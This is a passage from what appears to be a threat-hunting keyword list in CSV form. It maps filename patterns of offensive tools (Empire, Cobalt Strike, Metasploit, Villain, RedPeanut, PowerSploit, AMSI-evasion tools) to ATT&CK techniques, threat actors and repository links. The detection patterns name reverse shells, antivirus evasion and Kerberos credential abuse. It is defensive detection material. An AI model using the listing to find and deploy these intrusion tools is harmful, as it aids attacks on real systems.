T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*powershell_management_psinject*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_management_spawn*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - 
T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*PowerShell_PoC.zip*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*powershell_privesc_bypassuac_eventvwr*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_privesc_sherlock*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 
- T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_reverse_shell.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*powershell_reverse_tcp.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*powershell_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*powershell_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*powershell-admin-download-execute.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z"
+"*PowershellAgentGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*PowershellAmsiGenerator*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*PowerShellArsenal*","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. 
etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","828","224","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z"
+"*PowerShellArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*PowershellCradleGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*PowerShellEmpire*","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. 
many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://www.powershellempire.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PowerShellExecuter.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*powershell-import *.ps1*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*powershell-import*Invoke-Kerberoast.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell-import*ShareFinder.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. 
Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PowershellKerberos-main*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*PowerShellMafia*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PowerShellMafia/PowerSCCM*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
+"*PowerShellMafia/PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerShellObfuscator.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
+"*PowershellRunner.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*PowerShellStager*","offensive_tool_keyword","koadic","Koadic. 
or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*PowerShell-Suite*","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. 
This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2511","794","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z"
+"*PowerShx.dll*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*PowerShx.exe*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*PowerShx.sln*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*PowerShxDll.csproj*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*PowerShx-master*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules 
that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerSploit-*.zip*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerSploit.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerSploit/releases*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*powerstager*","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","2","181","59","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z"
+"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*PowerUpSQL*","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1087 - T1059 - T1003 - T1078 - T1053 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","2182","456","2023-06-27T02:42:35Z","2016-06-22T01:22:39Z"
+"*PowerView.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
